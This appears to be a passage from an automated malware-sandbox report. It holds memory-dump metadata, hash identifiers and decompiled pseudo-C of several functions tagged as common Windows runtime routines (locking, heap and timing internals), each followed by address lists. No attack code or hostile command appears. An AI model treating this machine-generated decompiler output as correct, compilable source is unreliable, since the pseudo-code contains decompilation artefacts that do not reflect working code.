                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ddafff203655497ce5fd7efe1e16f91e1dba56e2ef77d4d23f2b1b957e67eb02
                                                        • Instruction ID: 06f4179460a455eb7278a73b48097e8d303c9538fea1a660e6ccdc016622d716
                                                        • Opcode Fuzzy Hash: ddafff203655497ce5fd7efe1e16f91e1dba56e2ef77d4d23f2b1b957e67eb02
                                                        • Instruction Fuzzy Hash: D3712332200715AFEB31DF18CA40F66B7F9EB40724F144A38E6558B2A5EBB1F940CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048952A5, Relevance: .2, Instructions: 161COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 80%
                                                        			E048952A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E048AEEF0(0x49879a0);
					_t104 =  *0x4988210; // 0x261ea0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E048AEB70(_t93, 0x49879a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E048D9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E048AEEF0(0x49879a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E048AEB70(0, 0x49879a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0x261eb802
								_t13 = _t104 + 0xc; // 0x261ead
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E048CF0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E048AEEF0(0x49879a0);
									__eflags =  *0x4988210 - _t104; // 0x261ea0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x4988210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2000261e
											_t95 =  *((intOrPtr*)( *_t37));
											E04914888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E048AEB70(_t95, 0x49879a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E048D95D0();
											L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E048D95D0();
											L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E048AEB70(_t93, 0x49879a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E048D95D0();
										L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E048D95D0();
										L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2000261e
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0x261eb802
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E048CF0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                        0x048952a5
                                                        0x048952ad
                                                        0x048952b0
                                                        0x048952b3
                                                        0x048952b7
                                                        0x048952ba
                                                        0x048952bf
                                                        0x048952c4
                                                        0x048952cc
                                                        0x00000000
                                                        0x00000000
                                                        0x048952ce
                                                        0x048952d1
                                                        0x048952d9
                                                        0x048952dd
                                                        0x048952e7
                                                        0x048952f7
                                                        0x048952f9
                                                        0x048952fd
                                                        0x048f0dcf
                                                        0x048f0dd5
                                                        0x048f0dd6
                                                        0x048f0dd7
                                                        0x048f0dd8
                                                        0x048f0dd9
                                                        0x048f0dde
                                                        0x048f0ddf
                                                        0x048f0de0
                                                        0x048f0de1
                                                        0x048f0de2
                                                        0x048f0de2
                                                        0x048f0de5
                                                        0x048f0dea
                                                        0x048f0dec
                                                        0x048f0f60
                                                        0x048f0f64
                                                        0x048f0f70
                                                        0x048f0f76
                                                        0x048f0f79
                                                        0x048f0f79
                                                        0x00000000
                                                        0x048f0f64
                                                        0x048f0df2
                                                        0x048f0df7
                                                        0x048f0e04
                                                        0x048f0e04
                                                        0x048f0e0d
                                                        0x048f0e0d
                                                        0x048f0e10
                                                        0x048f0e1a
                                                        0x048f0e1c
                                                        0x048f0e4c
                                                        0x048f0e52
                                                        0x048f0e61
                                                        0x048f0e67
                                                        0x048f0e6b
                                                        0x048f0e70
                                                        0x048f0e76
                                                        0x048f0ed7
                                                        0x048f0edc
                                                        0x048f0ee0
                                                        0x048f0ee6
                                                        0x048f0eea
                                                        0x048f0eed
                                                        0x048f0ef0
                                                        0x048f0ef3
                                                        0x048f0ef6
                                                        0x048f0ef9
                                                        0x048f0efb
                                                        0x048f0efe
                                                        0x048f0f01
                                                        0x048f0f01
                                                        0x048f0f0b
                                                        0x048f0f12
                                                        0x048f0f16
                                                        0x048f0f18
                                                        0x048f0f18
                                                        0x048f0f1b
                                                        0x048f0f2c
                                                        0x048f0f31
                                                        0x048f0f31
                                                        0x048f0f35
                                                        0x048f0f39
                                                        0x048f0f3a
                                                        0x048f0f3c
                                                        0x048f0f3c
                                                        0x048f0f3f
                                                        0x048f0f50
                                                        0x048f0f55
                                                        0x048f0f55
                                                        0x048f0f59
                                                        0x048952eb
                                                        0x048952f1
                                                        0x048952f1
                                                        0x048f0e7d
                                                        0x048f0e84
                                                        0x048f0e88
                                                        0x048f0e8a
                                                        0x048f0e8a
                                                        0x048f0e8d
                                                        0x048f0e9e
                                                        0x048f0ea3
                                                        0x048f0ea3
                                                        0x048f0ea7
                                                        0x048f0eaf
                                                        0x048f0eb3
                                                        0x048f0eb9
                                                        0x048f0eb9
                                                        0x048f0ebc
                                                        0x048f0ecd
                                                        0x048f0ecd
                                                        0x00000000
                                                        0x048f0eb3
                                                        0x048f0e1e
                                                        0x048f0e21
                                                        0x048f0e25
                                                        0x048f0e2b
                                                        0x048f0e2f
                                                        0x048f0e30
                                                        0x048f0e3a
                                                        0x048f0e3f
                                                        0x048f0e41
                                                        0x00000000
                                                        0x00000000
                                                        0x048f0e47
                                                        0x00000000
                                                        0x048f0e47
                                                        0x048f0df9
                                                        0x048f0dfe
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048f0dfe
                                                        0x04895303
                                                        0x04895307
                                                        0x00000000
                                                        0x04895309
                                                        0x00000000
                                                        0x04895309
                                                        0x04895307
                                                        0x048952e9
                                                        0x048952e9
                                                        0x00000000
                                                        0x048952e9
                                                        0x0489530e
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 17e57706223c635c2fac6391f85056fce6cee4477469b08f8272cf09bbc1d896
                                                        • Instruction ID: 900c8f9793da7edca42a27fc424ce838e806a83c02cac86aa80e4c92d835c92f
                                                        • Opcode Fuzzy Hash: 17e57706223c635c2fac6391f85056fce6cee4477469b08f8272cf09bbc1d896
                                                        • Instruction Fuzzy Hash: DE519971245741AFE721AFA8C840B26BBE4FB84718F144E2EE995C7651E7B0F814CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0495AE44, Relevance: .2, Instructions: 152COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 86%
                                                        			E0495AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0495C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0495ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0495FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0495EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E048B7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E04951608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E04961536(0x4988ae4, (_t74 -  *0x4988b04 >> 0x14) + (_t74 -  *0x4988b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0495C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0495A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0493CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0495ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                        0x0495ae44
                                                        0x0495ae4c
                                                        0x0495ae53
                                                        0x0495ae55
                                                        0x0495ae5c
                                                        0x0495ae64
                                                        0x0495ae68
                                                        0x0495ae75
                                                        0x0495ae75
                                                        0x0495ae78
                                                        0x0495ae7a
                                                        0x0495ae7c
                                                        0x0495ae7f
                                                        0x0495aea8
                                                        0x0495aeab
                                                        0x0495aead
                                                        0x00000000
                                                        0x00000000
                                                        0x0495aeb3
                                                        0x0495aeb8
                                                        0x0495aebb
                                                        0x0495aebd
                                                        0x00000000
                                                        0x0495ae81
                                                        0x0495ae88
                                                        0x0495ae8f
                                                        0x0495ae9b
                                                        0x0495ae96
                                                        0x0495ae96
                                                        0x0495ae96
                                                        0x0495aea0
                                                        0x0495aea3
                                                        0x0495aebf
                                                        0x0495aebf
                                                        0x0495aec3
                                                        0x0495aec9
                                                        0x0495af0d
                                                        0x0495af14
                                                        0x0495af3d
                                                        0x0495af3d
                                                        0x0495af41
                                                        0x0495af44
                                                        0x0495af67
                                                        0x0495af67
                                                        0x0495af6a
                                                        0x0495afca
                                                        0x0495afd1
                                                        0x00000000
                                                        0x0495afd1
                                                        0x0495af6c
                                                        0x0495af6d
                                                        0x0495af75
                                                        0x0495af7c
                                                        0x0495af7e
                                                        0x0495af80
                                                        0x0495af85
                                                        0x0495af87
                                                        0x0495af99
                                                        0x0495af89
                                                        0x0495af92
                                                        0x0495af92
                                                        0x0495af9e
                                                        0x0495afa1
                                                        0x0495afa3
                                                        0x0495afa9
                                                        0x0495afb0
                                                        0x0495afb2
                                                        0x0495afb4
                                                        0x0495afbc
                                                        0x0495afbc
                                                        0x0495afb4
                                                        0x0495afb0
                                                        0x00000000
                                                        0x0495afa1
                                                        0x0495af4f
                                                        0x0495af57
                                                        0x0495af5c
                                                        0x0495af5e
                                                        0x00000000
                                                        0x00000000
                                                        0x0495af60
                                                        0x0495af64
                                                        0x0495af64
                                                        0x00000000
                                                        0x0495af64
                                                        0x0495af1a
                                                        0x0495af25
                                                        0x00000000
                                                        0x00000000
                                                        0x0495af27
                                                        0x0495af28
                                                        0x0495af33
                                                        0x00000000
                                                        0x0495aed0
                                                        0x0495aed0
                                                        0x0495aed2
                                                        0x0495aee1
                                                        0x0495aee4
                                                        0x00000000
                                                        0x00000000
                                                        0x0495aee6
                                                        0x0495aeec
                                                        0x00000000
                                                        0x00000000
                                                        0x0495aefb
                                                        0x0495af07
                                                        0x0495afd3
                                                        0x0495afdb
                                                        0x0495afdb
                                                        0x00000000
                                                        0x0495af07
                                                        0x0495aed6
                                                        0x0495aed8
                                                        0x0495aedf
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0495aedf
                                                        0x0495aec9

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b74e8d8bcc881efe51ac882648806aafbf7076554b6c3b3179a2b317daa91357
                                                        • Instruction ID: 2a37f3e994f1ab56103c991d30283ac39a455dd4b227cd5f89c6394eac54f43d
                                                        • Opcode Fuzzy Hash: b74e8d8bcc881efe51ac882648806aafbf7076554b6c3b3179a2b317daa91357
                                                        • Instruction Fuzzy Hash: EC41D3717402115BDB25DB29C894B3BB79EAF84764F244739FC16872A0D734F801C7A9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048BDBE9, Relevance: .1, Instructions: 149COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 86%
                                                        			E048BDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0489CC50(E04894510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E048B7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E04968ED6(_t102, _t98);
						}
						_t76 = _v44;
						E048B2280(_t58, _v44);
						E048BDD82(_v44, _t102, _t98);
						E048BB944(_t102, _v5);
						return E048AFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x4988628; // 0x0
							_v28 = _t67;
							_t68 =  *0x498862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x4988628; // 0x0
						_t105 = _v28;
						_t80 =  *0x498862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x495fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                        0x048bdbe9
                                                        0x048bdbf2
                                                        0x048bdbf7
                                                        0x048bdbf9
                                                        0x048bdbfc
                                                        0x048bdc00
                                                        0x048bdc03
                                                        0x048bdc14
                                                        0x048bdd54
                                                        0x048bdd54
                                                        0x048bdd54
                                                        0x048bdc18
                                                        0x048bdc1d
                                                        0x048bdc1d
                                                        0x048bdc32
                                                        0x048bdc3b
                                                        0x048bdc3e
                                                        0x048bdc46
                                                        0x048bdd5b
                                                        0x048bdd62
                                                        0x048bdd64
                                                        0x048bdd67
                                                        0x048bdd69
                                                        0x048bdd6b
                                                        0x048bdd6e
                                                        0x048bdd70
                                                        0x048bdd73
                                                        0x048bdd73
                                                        0x00000000
                                                        0x048bdc4c
                                                        0x048bdc4e
                                                        0x04903ae3
                                                        0x04903ae8
                                                        0x04903aea
                                                        0x048bdce7
                                                        0x048bdce9
                                                        0x048bdcec
                                                        0x048bdcee
                                                        0x048bdcf0
                                                        0x048bdcf3
                                                        0x048bdcf5
                                                        0x04903af2
                                                        0x04903af5
                                                        0x04903af5
                                                        0x048bdd06
                                                        0x048bdd08
                                                        0x048bdd0b
                                                        0x048bdd12
                                                        0x04903b08
                                                        0x048bdd18
                                                        0x048bdd18
                                                        0x048bdd18
                                                        0x048bdd20
                                                        0x048bdd23
                                                        0x04903b16
                                                        0x04903b16
                                                        0x048bdd29
                                                        0x048bdd2d
                                                        0x048bdd36
                                                        0x048bdd40
                                                        0x048bdd51
                                                        0x048bdd51
                                                        0x048bdc54
                                                        0x048bdc59
                                                        0x048bdc59
                                                        0x048bdc5e
                                                        0x048bdc5e
                                                        0x048bdc63
                                                        0x048bdc66
                                                        0x048bdc6b
                                                        0x048bdc78
                                                        0x048bdc7b
                                                        0x048bdc81
                                                        0x048bdc81
                                                        0x048bdc83
                                                        0x048bdc89
                                                        0x00000000
                                                        0x00000000
                                                        0x048bdd7b
                                                        0x048bdd7b
                                                        0x048bdc8f
                                                        0x048bdc8f
                                                        0x048bdc92
                                                        0x048bdc99
                                                        0x048bdc9f
                                                        0x048bdca5
                                                        0x048bdcaa
                                                        0x048bdcaa
                                                        0x048bdcb3
                                                        0x048bdcb8
                                                        0x048bdcbb
                                                        0x048bdcc1
                                                        0x048bdccf
                                                        0x048bdcd2
                                                        0x048bdcd5
                                                        0x048bdcd7
                                                        0x048bdcda
                                                        0x048bdcdc
                                                        0x048bdcdc
                                                        0x048bdce2
                                                        0x048bdce4
                                                        0x00000000
                                                        0x048bdce4

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a2fd783c473efaadb0d4d13260461624d81c1b0df2a0e94d641731d88bdf4df
                                                        • Instruction ID: 762b1317269565f7c17aa958c744d22dc2d2f8204b0dc9a300a43f9e94c4a534
                                                        • Opcode Fuzzy Hash: 9a2fd783c473efaadb0d4d13260461624d81c1b0df2a0e94d641731d88bdf4df
                                                        • Instruction Fuzzy Hash: 8B51B171A01605EFCB14DF68C49069EBBF5BB48314F248A69D995E7340EB70BD44CBD0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048AEF40, Relevance: .1, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 96%
                                                        			E048AEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04899080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x770bc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04892D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                        0x048aef4b
                                                        0x048aef4d
                                                        0x048aef57
                                                        0x048af0bd
                                                        0x048af0c2
                                                        0x048af0d2
                                                        0x048af0d2
                                                        0x048af0c2
                                                        0x048aef5d
                                                        0x048aef5f
                                                        0x048aef67
                                                        0x048aef6a
                                                        0x048aef6d
                                                        0x048aef74
                                                        0x048aef7f
                                                        0x048aef82
                                                        0x048aef82
                                                        0x048aef86
                                                        0x048aef88
                                                        0x048aef8c
                                                        0x048aef8f
                                                        0x048aef8f
                                                        0x048aef8f
                                                        0x00000000
                                                        0x048aef91
                                                        0x048aef93
                                                        0x048aefc4
